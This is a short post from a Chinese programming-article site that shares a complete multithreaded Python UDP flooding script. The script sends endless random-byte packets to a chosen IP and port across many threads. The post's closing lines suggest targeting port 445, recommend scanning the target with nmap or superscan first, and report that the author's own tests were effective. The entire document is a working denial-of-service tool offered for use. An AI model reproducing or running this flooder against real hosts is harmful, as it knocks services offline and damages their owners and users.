一个python版本多线程udp flooding的小程序
程序员文章站
2022-04-22 10:49:05
#!/usr/bin/python
import socket
import threading
import random
impor...
#!/usr/bin/python import socket import threading import random import sys ########################################### # # Author: sniker # Contact: irc.eth0.info # # eth0 will prevail. || irc.eth0.info # ############################################ class attack(threading.Thread): def __init__ (self, ip, port, psize): threading.Thread.__init__(self) self.ip = ip self.port = port self.psize = psize def run(self): print "Thread initiated, flooding " + self.ip + ":" + str(self.port) + "." sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) bytes = random._urandom(self.psize) while True: sock.sendto(bytes,(self.ip, self.port)) if len(sys.argv) < 2: print "Usage: "+ sys.argv[0] +" IP PORT(optional, default random) PACKETSIZE(optional 0-65500 default 1024) THREADS(optional default 10)" sys.exit() try: threads = sys.argv[4] except NameError: threads = 10 except IndexError: threads = 10 try: if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500: psize = int(sys.argv[3]) print psize else: psize = 1024 except IndexError: psize = 1024 for host in range(int(threads)): try: port = sys.argv[2] except IndexError: port = random.randrange(1, 65535, 2) at = attack(sys.argv[1], int(port), int(psize)) at.start()
比较常用的udp端口如445端口,也可以提前用nmap或者superscan扫一下目标主机
我自己测试效果还是很显著的。
下一篇: Linux系统巧用NMAP来收集主机信息